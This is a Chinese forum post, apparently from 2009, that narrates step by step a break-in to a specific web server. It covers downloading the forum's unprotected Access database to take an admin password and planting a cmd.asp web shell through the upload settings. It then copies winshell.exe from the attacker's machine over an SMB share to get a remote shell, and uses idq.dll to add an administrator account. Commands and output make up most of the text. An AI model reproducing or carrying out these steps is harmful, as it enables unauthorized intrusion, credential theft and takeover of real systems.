现在我们要从论坛入手了.
怎么入手呢?
可能有些同志马上就会开始测试%81,Translate:f.....
或猜文件名下载数据库,
但我觉得在不了解前就先不要盲目的碰.
现在开始在网上找这个论坛的程序下载
靠,好多地方都没有,
再搜...半小时后找到并下载.
呵呵~果然是用access
在自己的机器上装好此论坛,好好研究一下
发现:数据库名是f\*\*k.mdb,在/data下,呵呵~
论坛有上传功能,需要设置,管理员登陆程序是poweruser_in.asp
差不多了,可以看看运气如何了. http://61.61.13.13/bbs/data/f\*\*k.mdb
晕倒!竟然没改,可以下载,
4M多,一会就完了,拿access2000或myadmin.asp打开数据库
顺利拿到论坛管理帐号:play/1314520
再看看运气,会不会论坛帐户密码和系统的一样:
net use \\61.61.13.13\ipc$ "1314520" /user:"play"
net use \\61.61.13.13\ipc$ "1314520" /user:"administrator"
//运气不好,都失败.
现在登陆论坛管理页,输入用户名及密码登陆论坛管理,
熟练的找到上传设置(为什么会熟练呢?因为已经了解)
将允许上传的文件类型中加上.asp
知道要干什么了吧?对,上传个ASP小程序(在浏览器中得到一个命令条,输入命令后在浏览器中返回结果)
上传cmd.asp到/upload下,好快,才1K多点,
好喽~~,把刚才允许上传的文件类型中的.ASP再删掉,接着退出.
在浏览器中: http://61.61.13.13/bbs/upload/cmd.asp
出来了,呵呵~,收集点信息先:
dir c:\ d:\ e:\
net user
net start
net view
netstat -an
arp -a
...... //呵呵~~了解的差不多了
对了,试试at命令:
AT
拒绝访问。
倒,权限实在小的可怜啊!现在是需要提升权限了,
那就要上传文件,又到论坛里传???不用了,
虽然权限小,但还是有两种快捷的方法上传文件
1. net use \\myIP\c$ "mypass" /user:"myname"
2. tftp -i myIP get filename
明白了吧?我选第一种方法上传文件
先建立连接: net use \\myIP\c$ "mypass" /user:"myname" 命令成功完成
现在是不能直接copy文件到当前目录的,
因为当前默认路径是\winnt\system32,我们的权限小,这个目录我们是没有权限写的.
(具体中,你可以使用cacls命令查看对文件的权限)
那就建个目录先吧,建到d:\downloads下吧,那个目录我们有权限写:
md d:\downloads\winzip32 //呵呵~这名字不错.
先COPY个winshell.exe吧,开个telnet端口,命令行下总比在浏览器里方便啊.
copy \\myIP\c$\tools\winshell.exe d:\downloads\winzip32 已复制一个文件
启动它 d:\downloads\winzip32\winshell.exe 浏览器窗口会停好久,
不用等的,程序已经启动了,点停止,接着,
断开共享连接: net use \\myIP\c$ /del 完成
离开浏览器,打开命令行窗口
telnet 61.61.13.13 5277
WinShell v2.0 by janker@peckerland.com - '!' to end, 'Enter' to shell...
* d:\downloads\winzip32\winshell.exe
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
c:\winnt\system32>
//成功得到一个shell作者: sunweipeng 时间: 2009-7-29 13:48
我们现在的权限很小,许多目录都不能访问或写,所以我们要想办法提高权限, (个人认为如果是FAT32分区的话,可能会好办些,但NTFS,太麻烦)
这一步比较难,我试了很多方法都不成功.
比如:
使用netdde.exe pipeupadmin.exe 不行
上传了冰河6.0J,可以连接,但权限依然很小
而且你的木马和后门程序在对方重起后就不能用了
原因可能是权限小,无法创建服务或修改注册表,来实现开机自动启动.
在试验中,唯一觉得可行的是这样我运气!!!实际中我很少成功)
1.上传idq.dll到对方WEB目录里的可执行目录
2.用ispc 61.6.13.13/XXXX/idq.dll 连接上,得到system权限
3.或单独运行idq.dll,获得一个管理员组的用户"iisuser" 密码:"abcd1234" http://61.61.13.13/XXXX/idq.dll
There will add a Administrators User "iisuser",Its Password is "abcd1234".If you want to enter cmd.exe shell,please use ispc.exe.
但这样一样存在问题,这个可执行的目录必须是"脚本和可执行程序"的配置
单单是"纯脚本"不行的.
不知道谁还有更好的成功办法和思路.